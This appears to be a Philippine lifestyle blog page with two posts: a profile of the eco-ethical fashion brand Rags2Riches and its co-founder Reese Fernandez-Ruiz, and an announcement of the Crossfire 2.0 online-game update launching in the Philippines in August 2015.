This is not the usual fashion that we see from day to day. It is because of their peculiar way of transforming organic and indigenous materials, usually from up-cycled scrap cloth or fabrics, into a more useful and beautifully crafted accessories such as fashion handbags, eyeglass cases, wine bottle holders and more, all for sale in top-end shops.

Not only that. By partnering with Filipino artisans across the country, they create a so-called eco-ethical fashion with timeless styles and function. With this idea, they just not create sheer employment out of common artisans but also empower them to give their very best in every creation they make.

Globally recognized social entrepreneur Reese Fernandez-Ruiz is the President and co-Founder of Rags2Riches. With her team of young professionals, she sought advice from designers and collaborates with known fashion personalities and community leaders to make her mission and vision of the company become a reality. This could also be the reason why Rags2Riches is chosen to be one of the collaborators of Samsung Galaxy Tab A. Being unique has its rewards.

Reese of Rags2Riches

You can find more information about Reese and Rags2Riches by going to their official website.

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr

The Highly-Awaited Crossfire 2.0 is Coming Soon to Philippine Shores

Crossfire fans rejoice as the most awaited update in Crossfire Philippines is coming soon! CrossFire 2.0 will be heading to the Philippines sooner than you think!



The game that has captured the hearts of over 24 million Filipino gamers is about to get even bigger and better. Starting August 25, 2015 CrossFire 2.0 will be available for game play. Do you think you can handle it?

Gameclub Philippines in partnership with Crossfire Developer Smilegate Inc. is proud to present the much-hyped Crossfire 2.0. The Philippines would be the 4th among 11 regions to release the Crossfire 2.0 update. Filipino players will soon be able to play their favorite online FPS game in improved graphics and experience tons of new content.

One of the changes that gamers could expect to enjoy would be the aforementioned enhanced graphics and more realistic maps. CF 2.0 is bringing Crossfire to a whole new level through visual upgrades to character models, maps and weapons.

Along with these graphics changes are improvements to the user interface and an improved buddy system. The update would feature an additional function to manage friends in a more convenient way.

logo CF 2.0

And that’s not all, Crossfire 2.0 even introduces a new ranked match system, new weapons with special features and the very first VIP character. Players will now be able to test their skills against opponents of a similar skill level. The ranked match system would allow beginners of the game to improve their play against fellow newbies while the elite can compete amongst themselves to hone their skills for tournaments and competitive play. 

All these changes and additions are what make Crossfire 2.0 the most significant patch to date.

For inquiries and details, call  Gameclub at (02) 584-2811. Also for more news check out CrossFire through the following channels:

Website: Crossfire.ph
Facebook: https://www.facebook.com/crossfirephils

What CrossFire features and enhancements are you most excited about CF 2.0 once it's available here in the Philippines? Comment below!

Pictures:[source]

Like this story? Share it and don't forget to follow us on our social channels: Facebook, Twitter,  Instagram, Google+, Youtube, Flickr